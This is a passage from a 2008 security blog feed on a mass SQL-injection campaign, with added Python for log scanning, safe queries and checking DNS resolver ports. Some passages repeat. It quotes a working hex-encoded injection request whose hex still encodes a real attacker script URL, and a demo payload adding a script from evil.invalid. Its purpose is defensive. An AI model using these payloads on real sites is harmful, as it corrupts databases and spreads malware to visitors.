DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''">

To search your web server logs for offending requests, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least that's where I have seen them coming from).
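Here is an added example (not the post's or TrustedSource's code) of that log check in Python: it URL-decodes the query string of each request, flags any that contain DECLARE, and when a CAST(0x...) hex literal is present, decodes it so the analyst sees the SQL the server was asked to run. The log layout, client addresses and the encoded payload are constructed for the example; the hex decodes to a harmless DECLARE statement, not the real injection.

```python
import re
from urllib.parse import unquote

# Constructed, harmless stand-in for the hex-encoded statement. The real attack
# packs its whole cursor loop this way so the SQL is not readable in the raw log.
CONSTRUCTED_SQL = "DECLARE @T varchar(255) -- constructed harmless sample"
CONSTRUCTED_HEX = CONSTRUCTED_SQL.encode("ascii").hex().upper()

# Constructed sample lines in an IIS W3C-style layout:
# date time client-ip method uri-stem uri-query status
SAMPLE_LOG = f"""\
2008-08-12 10:00:01 192.0.2.10 GET /default.asp id=42 200
2008-08-12 10:00:02 192.0.2.11 GET /products.asp id=7';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x{CONSTRUCTED_HEX}%20AS%20CHAR(4000));EXEC(@S);-- 200
2008-08-12 10:00:03 192.0.2.12 GET /search.asp q=%44eclare%20cursor 200
2008-08-12 10:00:04 192.0.2.13 GET /about.asp - 200
"""

DECLARE_RE = re.compile(r"\bDECLARE\b", re.IGNORECASE)
HEX_LITERAL_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-F]+)", re.IGNORECASE)


def decode_hex_literal(hexdigits):
    """Turn a 0x... literal into the text SQL Server would see after CAST to CHAR."""
    if len(hexdigits) % 2:
        return None  # odd-length literal cannot be a byte string
    return bytes.fromhex(hexdigits).decode("latin-1")


def scan_log(text):
    """Return one finding per request whose decoded query string contains DECLARE."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 7:
            continue  # not a request line in the expected layout
        client, uri, query = fields[2], fields[4], fields[5]
        # Decode before matching: a raw grep for DECLARE misses %44eclare.
        decoded_query = unquote(query)
        if not DECLARE_RE.search(decoded_query):
            continue
        match = HEX_LITERAL_RE.search(decoded_query)
        findings.append({
            "line": lineno,
            "client": client,
            "uri": uri,
            "decoded_sql": decode_hex_literal(match.group(1)) if match else None,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['client']} {finding['uri']} "
              f"-> {finding['decoded_sql']!r}")
```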

How to solve?

First of all, if code like this can get through the web application and into the database, I'd recommend a complete review of the web app from a security standpoint. Basic best practices for web applications assume that you will trust absolutely no input by default, and then examine all input to see if it is in a format and of a type that is appropriate. And it's very important to recognize that by "input" we mean any type of input vector - whether it be form fields, query string, URI, session data, etc. Input validation should be done on the server side, not just the client side (turning off JavaScript and manipulating data en route to the server is pretty easy, after all).

If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and rewrite the offending statements to something innocuous. That's a band-aid, but it can help in the short term with this one particular need. In addition, you could use application-layer firewalls in front of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.

HP recently released a tool called Scrawlr that you can use to check specifically for SQL injection vulnerabilities. You can find it, and related information, here.

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!

If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. SQL Injection attacks in the wild - why they're working and what to do http://www.greghughes.net/rant/PermaLink,guid,c50ba4fe-59fa-4bec-8aae-49a65a7a8a84.aspx http://www.greghughes.net/rant/SQLInjectionAttacksInTheWildWhyTheyreWorkingAndWhatToDo.aspx Tue, 12 Aug 2008 22:24:30 GMT <p style="clear: both;"> A bunch of IT and web-app teams have lost a lot of sleep lately...<br> <br> Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).<br> <br> The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).<br> <br> Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked, the only common thread is SQL server (despite reports to the contrary).<br> <br> <b>About data validation...</b> <br> <br> I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. 
In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is the cases where you don't realize something should be on the list, or when new threats emerge. Instead, a white-list (or "allow-list") methodology requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default, <strike>it's the only safe way to go</strike>. <br> </p> <p style="clear: both;"> <b>UPDATE: </b>Neil Carpenter mentions in the comments here that he recently posted an excellent <a href="http://blogs.technet.com/neilcar/archive/2008/08/07/input-validation-is-not-the-answer.aspx">blog entry about using parametrized queries in SQL server</a>, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. 
A layered combination of both input validation (where it's practical and workable) and parameterized queries is a good approach, in my opinion.<br> <br> <b>The attack</b> </p> <p style="clear: both;"> <a href="http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines" target="_blank">Secure Computing's TrustedSource</a> (good site, read it) <a href="http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines" target="_blank">has some detail</a> about the attack...<br> <br> You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):<br> </p> <blockquote><pre>GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920 4F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);HTTP/1.1</pre> </blockquote> <p style="clear: both;"> Which is a hex-encoded injection that, when translated, creates this SQL statement string (bad-guy address has been removed):<br> </p> <blockquote>DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"&gt;</blockquote> <p style="clear: both;"> (The string is cut off here. Decoded in full, the batch walks every text column of every user table and appends a closing title tag plus a script tag that loads a file from the attacker's server, skipping columns that already contain it, then closes and deallocates the cursor.)<br> <br> To search your web server logs for any offending lines, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least that's where I have seen them coming from).<br> <br> <b>How to solve?</b> <br> <br> First of all, if code like this can get through the web application and into the database, I'd recommend a complete review of the web app from a security standpoint. Basic best-practices for web applications assume that you will trust absolutely no input by default, and then examine all input to see if it is in a format and of a type that is appropriate. And it's very important to recognize that by "input" we mean any type of input vector - whether it be form fields, query string, URI, session data, etc. Input validation should be done on the server side, not just the client side (turning off javascript and manipulating data en-route to the server is pretty easy, after all).<br> <br> If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and re-write the offending statements to something innocuous. That's a band-aid, but it can help in the short-term with this one particular need. 
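Here is what that log search looks like when you also want the hex turned back into readable SQL. This is an added example, not code from the original post: the log lines are constructed in a simplified W3C layout (date, time, method, uri-stem, uri-query, status), and the hex-cast payload is generated inside the script from the opening of the decoded statement above rather than copied from a real request, so no attacker URL is embedded.

```python
import re
import urllib.parse

# The opening of the decoded statement shown in the post; used only to build a
# constructed sample log line (the attacker's script URL is deliberately absent).
INJECTED_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)"
)


def build_payload(sql):
    """Wrap T-SQL the way the attack does: hex it, CAST it, EXEC it, URL-encode it."""
    hexed = sql.encode("ascii").hex().upper()
    batch = f"';DECLARE @S CHAR(4000);SET @S=CAST(0x{hexed} AS CHAR(4000));EXEC(@S);"
    return urllib.parse.quote(batch, safe="';@=()")


# Constructed sample log, simplified W3C layout:
# date time cs-method cs-uri-stem cs-uri-query sc-status   ('-' means no query string)
SAMPLE_LOG = [
    "2008-07-30 12:00:00 GET /default.aspx id=12 200",
    "2008-07-30 12:00:01 GET /search.aspx q=declare+of+independence 200",
    "2008-07-30 12:00:02 GET / " + build_payload(INJECTED_SQL) + " 200",
    "2008-07-30 12:00:03 GET /images/logo.gif - 200",
]

# T-SQL constructs that never belong in a query string. A bare word "declare" in
# a search term is not enough on its own; "DECLARE @", a hex CAST or EXEC( is.
TSQL_MARKERS = re.compile(r"DECLARE\s+@|CAST\s*\(\s*0x|EXEC\s*\(", re.IGNORECASE)
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{2,})")


def decode_hex_literals(decoded_query):
    """Return the ASCII behind every 0x... literal (the SQL the server would run)."""
    out = []
    for h in HEX_LITERAL.findall(decoded_query):
        h = h[: len(h) - len(h) % 2]          # drop a dangling nibble, if any
        out.append(bytes.fromhex(h).decode("latin-1"))
    return out


def scan_log(lines):
    """Return one hit per log line whose URL-decoded query string carries T-SQL."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6 or fields[4] == "-":
            continue
        decoded = urllib.parse.unquote(fields[4])   # %20 -> space; '+' is left alone
        if not TSQL_MARKERS.search(decoded):
            continue
        payloads = decode_hex_literals(decoded)
        hits.append({
            "time": f"{fields[0]} {fields[1]}",
            "path": fields[3],
            "decoded_query": decoded,
            "payloads": payloads,
            # A decodable hex batch means an injection attempt, not a stray keyword.
            "severity": "high" if payloads else "suspicious",
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["path"], hit["severity"])
        for sql in hit["payloads"]:
            print("    ", sql[:80], "...")
```

Run it over a real IIS log after adjusting the field indexes to your W3C header line; the decoded payload tells you which script URL was being injected, which is what you then search your database content for.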
In addition, you could use application-layer firewalls in front of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.<br> <br> HP recently released a tool that you can use to check for SQL injection vulnerabilities specifically <a href="http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx" target="_blank">called Scrawlr</a>. You can find it, and related information, <a href="http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx" target="_blank">here</a>.<br> </p> <blockquote><i>Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names</i>!</blockquote> <p style="clear: both;"> If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> IT Security Tech
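To make "coded properly" and the parameterized-query point from the update concrete, here is the shape of the fix as an added example (not code from the post or from any affected site): the same request parameter spliced into the statement text, and then handed over as a parameter instead, with an allow-list check in front. The product table, the attacker string and the use of SQLite's executescript() as a stand-in for a driver that runs whole batches (as SQL Server's does) are all constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's database: user tables with text columns,
    which is exactly what the cursor in the decoded statement walks."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        CREATE TABLE views(product_id);
        INSERT INTO products VALUES (1, 'widget', 'A fine widget');
        INSERT INTO products VALUES (2, 'gadget', 'A fine gadget');
    """)
    return conn


# Constructed attacker input of the same shape as the logged one: close the value,
# append an UPDATE that tags every description, comment out whatever follows.
# (SQLite spells string concatenation '||'; T-SQL uses '+', as in the post.)
PAYLOAD = ("1); UPDATE products SET description = description || "
           "'<script src=\"http://evil.invalid/w.js\"></script>'; --")


def vulnerable_record_view(conn, product_id):
    """Splice the raw value into the statement text and send the whole batch.

    sqlite3.executescript() stands in for a driver, such as SQL Server's, that
    executes every statement in the text it is handed; that is what lets the
    attacker's UPDATE ride along behind the application's INSERT.
    """
    conn.executescript(f"INSERT INTO views(product_id) VALUES ({product_id});")


def safe_record_view(conn, product_id):
    """Parameterized: the value travels separately and is never parsed as SQL."""
    conn.execute("INSERT INTO views(product_id) VALUES (?)", (product_id,))


def valid_product_id(value):
    """The allow-list layer: a product id is a short run of digits, nothing else."""
    return value.isdigit() and len(value) <= 9


def descriptions(conn):
    return [row[0] for row in conn.execute("SELECT description FROM products ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    vulnerable_record_view(db, PAYLOAD)
    print("concatenated:  ", descriptions(db))   # every row now carries the script tag

    db = make_db()
    if valid_product_id(PAYLOAD):               # rejected before it reaches the database
        safe_record_view(db, PAYLOAD)
    print("parameterized: ", descriptions(db))   # unchanged
```

Parameterization alone is what stops the injection; the allow-list check is the second layer the post argues for, and it also keeps garbage like the payload out of the views table entirely.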

IT Risk Management - an interview with my friend Simon Goldstein
http://www.greghughes.net/rant/PermaLink,guid,f37c508f-c1d2-4b9b-b414-5da4074a5b2f.aspx
Mon, 28 Jul 2008 03:39:34 GMT
<p style="clear: both; "> Last week <a href="http://runasradio.com/default.aspx?showNum=67" target="_blank">we published an interview</a> that Richard and I did on RunAs Radio with my friend and former co-worker, Simon Goldstein. Simon's a real pro and is good at explaining complicated business relationships and processes.<br /> <br /> We cover risk management for IT professionals: What is it, what do you need to know, and why does it matter? As with all of our weekly RunAs Radio shows, it's about 30 minutes long and we cover a lot of ground in that time.<br /> </p> <blockquote>RunAs Radio, Show 67 - <a href="http://runasradio.com/default.aspx?showNum=67" target="_blank">Simon Goldstein on IT Risk Management</a> (38 minutes)<br /> <br /> Note: You can find all our podcast feeds <a href="http://runasradio.com/" target="_blank">in the table here</a>, and you can also <a href="http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=253682066" title="" target="_blank">subscribe to get the show every week in iTunes by clicking here</a>.</blockquote>
IT Security RunAs Radio Tech

What will it take to get OpenID adopters to be relying parties?
http://www.greghughes.net/rant/PermaLink,guid,789f3cf1-4fce-426f-9acb-da1429fa3662.aspx
Sun, 27 Jul 2008 17:56:08 GMT
Over <a href="http://www.internetevolution.com/author.asp?section_id=645&amp;doc_id=159806&amp;" title="" target="">on the Internet Evolution site I recently wrote an article</a> discussing the fact that MySpace is becoming an OpenID provider. Of note is the fact that they will be provider-only, and not a relying party, at least initially. This is a trend we've seen with other big companies like Yahoo!, and many of us are not-too-patiently waiting for these companies to start trusting and relying upon other organizations, so the utopia of user-controlled Internet single-sign-on can become a reality.<br> <br> That raises the question, "What will it take to achieve the level of trust and confidence needed to make it easy for these big provider companies to join the relying-party crowd?" I'm certain there are plenty of detailed conversations and that things are being hammered out and actively discussed behind the scenes at all these major companies, but I tend to think about these things out loud anyhow.<br> <br> So, I hope you'll <a href="http://www.internetevolution.com/author.asp?section_id=645&amp;doc_id=159806&amp;">read my article and thoughts over on Internet Evolution</a> and that you'll take advantage of the opportunity to comment there. I'd be interested to know what you think.
IT Security Tech

DNS exploit now in the wild - 52% of DNS servers vulnerable today
http://www.greghughes.net/rant/PermaLink,guid,3783a4c8-8fab-4d60-8a2a-4dae232d3e61.aspx
Sat, 26 Jul 2008 19:38:05 GMT
<p style="clear: both; "> The <a href="http://www.greghughes.net/rant/IsYourDNSServerSafeMajorSecurityHoleNeedsToBePatchedRightNow.aspx" target="_blank">DNS vulnerability</a> discovered earlier this year by Dan Kaminsky, and recently patched by DNS software providers in an unprecedented cross-vendor cooperation, has graduated from vulnerability to exploit-in-the-wild.<br /> <br /> According to <a href="http://www.doxpara.com/" target="_blank">Kaminsky</a>, 52% of the DNS servers on the Internet are still vulnerable, an improvement on the share that was exploitable just a few weeks ago, when the vendors released their patches.<br /> <br /> Kaminsky has written up <a href="http://www.doxpara.com/?p=1185" target="_blank">a plain-language helper guide</a> to explain the problem to non-technical (read: management and decision-making) people. There's also <a href="http://tinyurl.com/6hr3tw" title="" target="_blank">a Black Hat webcast with Kaminsky available</a> where he details the vulnerability and discusses the fixes.<br /> <br /> Read more <a href="http://arstechnica.com/news.ars/post/20080726-new-dns-exploit-now-in-the-wild-and-having-a-blast.html" target="_blank">at Ars Technica</a>. </p>
IT Security Tech

San Francisco's network security woes - Everyone to blame?
http://www.greghughes.net/rant/PermaLink,guid,e8aa21cb-3742-42c2-8950-a3276865e8b9.aspx
Wed, 23 Jul 2008 19:04:17 GMT
<p style="clear: both;"> In <a href="http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2008/07/22/BAGF11T91U.DTL" target="_blank">the case of Terry Childs</a>, a network admin who gained notoriety recently for locking the City of San Francisco and his managers out of their own critical network, comic-book style progress has been made, with Childs' attorney inviting the mayor of SF to a secret meeting at the jail, where Childs handed over the passwords he'd previously refused to disclose. </p> <p style="clear: both;"> Childs' lawyer, again in typical comic book fashion, has also come out saying that Childs' actions were essentially noble and that he was acting to protect the network he built from his management and peers, whom he characterized as being neglectful and without the proper knowledge to support the network. About what you'd expect from a defense lawyer in a public case, I suppose.<br> <br> But Childs is in no way a hero. Even if what he says is completely true, he's (allegedly) committed a real crime. He does not own that network even if he helped build it, and regardless of whether the management in his department was capable of exercising its responsibilities, when Childs locked everyone out he crossed a clear line. If it was to make a point, he simply went overboard. The whole unfortunate case just smacks of ego and manic behavior.<br> <br> But from arm's length the city doesn't exactly look like a helpless victim, either. Any professional management team that creates an environment where one person can control a critical and sensitive network in the manner exercised in this case has missed some of the most crucial and common-sense aspects of IT and security design. In fact, most of the time when cases of one-man-too-much-power crop up, we find that the IT staff is also responsible for security with little or no separation of duties, no checks and balances, and no controls to ensure one bad apple doesn't ruin the whole barrel.<br> <br> Was Childs right? Absolutely not. Was the City wrong? I don't see how you can argue otherwise.<br> <br> You'd likely be surprised how many real-world computer networks - big and small, important and less so - are run on the concept of "we just trust that one guy." It's what we call a "Beer Truck" risk problem: If I'm that guy you trust, what if I get hit by a beer truck and killed, or alternatively what if I drink everything on that beer truck and go nuts and wipe out the network? What then?<br> <br> Systems should be set up to ensure no one person holds all the keys. Over the past few days I've read comments made about this story, in many cases by angry IT-types who say if you hire someone you have to give them access to everything and you have to trust them to do the right thing. Otherwise they cannot do their job, you're a terrible person and your network and systems are doomed. That premise is simply and blatantly false, and in fact following that method puts you in the same boat the City of San Francisco has just found itself in. Please, don't listen to the old-skool IT admin crowd, telling you to hand it all over to them because you obviously don't know what you're doing. Fire those guys and find some real help.<br> <br> If you want a healthier view of the situation, <a href="http://www.internetevolution.com/author.asp?section_id=690&amp;doc_id=159486&amp;" title="" target="_blank">check out articles written by smart, thoughtful people, like this one by Paul Doyle</a>. Also, <a href="http://www.infoworld.com/article/08/07/18/30FE-sf-network-lockout_1.html">Paul Venezia wrote an in-depth article about what went wrong</a>, with some detailed inside information.<br> <br> To be clear, no one person should control all the systems. Control and authority are not the same thing. Checks and balances are important. The Air Force doesn't allow one person to perform all the steps needed to launch a ballistic missile, right? Apply the same principles to your IT systems. </p> <p style="clear: both;"> Case in point: I was the chief security executive at a major online financial services company. I had administrative access to nothing. I couldn't even get in the data center without an escort and records being kept. I had no account access to critical or sensitive systems. And no one person there could make changes in a vacuum. IT workers didn't have access to security systems. Security workers didn't have administrative access to anything by default. And we operated effectively, smoothly, with full knowledge of what was happening on the network and systems. No one person had control. Authority, sure. But actual control of systems? No. To operate otherwise would have been negligent.<br> <br> I often preach the value of formalizing security management and putting proper process, technology and organization in place to ensure a good, stable system that can effectively support business. One of the pillars of an effective security management system is hiring good people (probably not ones who have been convicted of aggravated robbery in the past, sorry) and separating duties in a way that protects everyone involved - employees included. Doing so is not punishment, it's just good common sense.<br> <br> If nothing else, let's hope businesses and governments all over learn from this embarrassing public spectacle. There are standards out there (my background and experience is in ISO 27001, an international security management standard), the very purpose of which is to make sure things like this don't happen. It's high time to start using them. </p>
IT Security Tech

Is your DNS server safe? Major security hole needs to be patched right now
http://www.greghughes.net/rant/PermaLink,guid,a7014cb5-0a6b-41a7-868e-b0a006af99af.aspx
Wed, 23 Jul 2008 15:14:34 GMT
<p style="clear: both;"> <b><i>DNS has a hole in it. Bad guys are working on exploits right now. Patches are available right now. Anyone responsible for a DNS server needs to exercise that responsibility. Right Now.</i></b> <br> <br> Dan Kaminsky <a href="http://www.doxpara.com/?p=1162" title="" target="_blank">found a security hole</a> in DNS recently, the details of which he was keeping quiet so providers could fix and release patches and DNS server owners could get those patches deployed, in order to avoid security breaches on the Internet. His intent was to release the gory details in a couple weeks at the Black Hat conference. </p> <p style="clear: both;"> But the other day word of the details inadvertently leaked out, and so now everyone responsible for a DNS system must - and I do mean <i>must</i> - drop what they're doing and make sure their systems are patched and safe. Failure to do so puts Internet users at risk of site fraud and hijacking. </p> <p style="clear: both;"> DNS is a system that translates names you can remember (like www.greghughes.net) to especially non-memorable numerical addresses the Internet can route (such as 208.109.238.146). It's the Internet's phone book, so to speak.<br> <br> The security hole allows malicious people to spoof a web site using the actual, legitimate domain name. In other words, bad guys could poison the cache of a DNS server (feed it a wrong address for a name it then hands out to everyone who asks), and if it happens to be one your computer relies upon, you could type in a legitimate address like www.google.com or www.yourbank.com, but the web page would be a malicious one - a fake. The recently-released patches plug the hole and prevent this misuse (although they don't really change the underlying protocol).<br> <br> <a href="http://blaynesucks.com/2008/07/22/protocol-level-dns-flaw" target="_blank">Aaron Massey wrote a very good post</a> describing the issue and its various details. He also <a href="http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html" target="_blank">links to Halvar Flake</a>, a talented reverse-engineering guy who thought the threat through and pretty much guessed it right on his blog. After Halvar's guess, another security blog that had specific knowledge of the threat details confirmed Flake's hypothesis. As a result, the threat was disclosed.<br> <br> Luckily, the various creators of the DNS systems used all over the Internet <a href="http://www.doxpara.com/?p=1162" target="_blank">released patches about two weeks ago</a>. The real question is, have you patched your servers? This is a critical flaw - it needs to be patched immediately.<br> <br> If you want to know whether the DNS server your computer relies upon is vulnerable or not, you can use <a href="http://www.doxpara.com/" target="_blank">the DNS Checker in the sidebar of Kaminsky's blog</a> (as long as it remains there). </p>
IT Security Tech Things that Suck
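The reason the patches fix the problem without touching the protocol is that they randomize the UDP source port of the resolver's outgoing queries, so a forged answer has to match both the 16-bit transaction ID and the port rather than the ID alone. If you would rather check your own resolver offline than rely on a web checker, the script below is an added example (not from the post and not Kaminsky's checker): given (source port, transaction ID) pairs captured from the resolver's upstream side, it decides whether the ports look predictable and how large the guess space is. The samples are constructed with a seeded generator, and the cut-offs for "predictable" are the example's own choices.

```python
import math
import random
from collections import Counter


def constructed_sample(randomize_port, n=64, seed=1):
    """Constructed (source_port, txid) pairs as a resolver emits them upstream.

    Real samples come from a packet capture of the resolver's outbound UDP/53
    traffic. Unpatched behaviour is modelled as one incrementing port per query.
    """
    rng = random.Random(seed)
    pairs = []
    for i in range(n):
        port = rng.randrange(1024, 65536) if randomize_port else 32768 + i
        pairs.append((port, rng.getrandbits(16)))
    return pairs


def distinct_ports(samples):
    return len({port for port, _ in samples})


def ports_are_sequential(samples):
    ports = [port for port, _ in samples]
    return len(ports) > 1 and all(b - a == 1 for a, b in zip(ports, ports[1:]))


def port_entropy_bits(samples):
    """Shannon entropy of the observed ports; capped by log2(len(samples))."""
    counts = Counter(port for port, _ in samples)
    n = len(samples)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def assess(samples):
    """Return (verdict, bits an off-path attacker must guess per forged reply)."""
    n = len(samples)
    if n < 16:
        raise ValueError("need more queries to judge")
    d = distinct_ports(samples)
    # Thresholds are this example's own: one port, a counter, or a tiny pool
    # all count as predictable.
    if d == 1 or ports_are_sequential(samples) or d < n // 4:
        # Only the 16-bit transaction ID protects the lookup: the condition
        # the exploit relies on.
        return "predictable source port (unpatched behaviour)", 16.0
    # The port varies per query; sample entropy is a lower bound on what the
    # attacker must guess on top of the transaction ID.
    return "randomized source port (patched behaviour)", 16.0 + port_entropy_bits(samples)


if __name__ == "__main__":
    for label, randomized in (("unpatched", False), ("patched", True)):
        verdict, bits = assess(constructed_sample(randomized))
        print(f"{label}: {verdict}; about 2^{bits:.1f} guesses per forged reply")
```

Sixty-four queries can show at most six bits of port entropy, so treat the number as a floor; a resolver behind a NAT that rewrites source ports will look "unpatched" here even when the resolver itself is fixed, which is a real deployment problem rather than a measurement error.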

Chances are, if you're reading this around the time I am writing it, that your computer is not exposed to an IPv6 network. You're most likely on an IPv4 (classic) network. You can easily tell by trying the quick IPv6 test on this page.

Even if you're not on the new network stack yet, change is happening, and systems have to be adapted to make sure not only that the new network works (most - but not all - modern hardware and software "understands" IPv6), but also that you are properly secured when you do actually start to operate in an IPv6 world.

In an effective security world, you need to put protections in place soon enough, meaning before the threat appears. You have to protect proactively, without waiting for bad guys to exploit a network or system. In the case of the IPv4 to IPv6 transition, that means making sure things like intrusion prevention and detection systems, firewalls, and other software and devices that function in the network layer even know how to "talk" the IPv6 language.

A number of current security applications just don't know how, so now is the time for a call to action: IPv6-enable your technology right now, to prevent opportune threats in the future. Don't get caught with your pants down.

Kim Zetter wrote a good article on the subject the other day at WIred. "The Ghost in Your Machine: IPv6 Gateway to Hackers" outlines quite well the potential threat imposed by a lack of readiness from a security perspective. It's not all bleak and terrible news, but as the article makes clear, now is the time to fix the problem, before something bad happens.

Probably the most difficult aspect of understanding the potential issues introduced by an environment not ready for IPv6 is the lack of awareness among IT folk in general as to how IPv6 works, how it's used, and the services (quite good ones, I might add - take a look at how IPsec is baked right in, for example) integral to the protocol.

What's it take to get from here to there? Being prepared with real, solid and accurate information is probably the most important step. Not many of us are naturally wired to take action before something bad happens. As an IT guy, I can tell you this: In the real world, most IT people don't learn what they need to know until after they need to know it. A lazy learning methodology just won't work in this case.

For IT professionals, do not assume that just because you were able to pick up your IPv4 knowledge over a long weekend of studying and tinkering that you'll be able to do the same with IPv6 - That's just not the case. IPv6 is more complex and has a lot more parts to understand. If you haven't learned it by now, for shame. Some of you have a little time left. Get on the ball, and gain the deep understanding you need to do your job properly.

For application and hardware vendors that haven't yet dealt with the IPv6 change, you're running late. While many vendors of firewall software, switched, home routers, etc. have made the proper changes, there are also many that have not. Even worse, there are a variety of IPv4-to-IPv6 workarounds that can relatively easily be put in place by unknowing people (read: the IT guys mentioned above) that circumvent firewalls and other protections that are relied upon for good security. Bad design, convenient at the time, disaster waiting to happen. Prevent this.

If you're an individual computer user or owner, what is the status of your software vendors with regard to dealing with IPv6 network traffic? Are you running the latest firewall software, current router firmware? Do the latest versions protect you in an IPv6 world?

IPv6 is a great move, and in time it will dramatically change for the better how computers and devices interact. That is, if we don't manage to screw it all up in the process.

Now is the time. IPv6 is here, Go forth. Learn, analyze and secure.



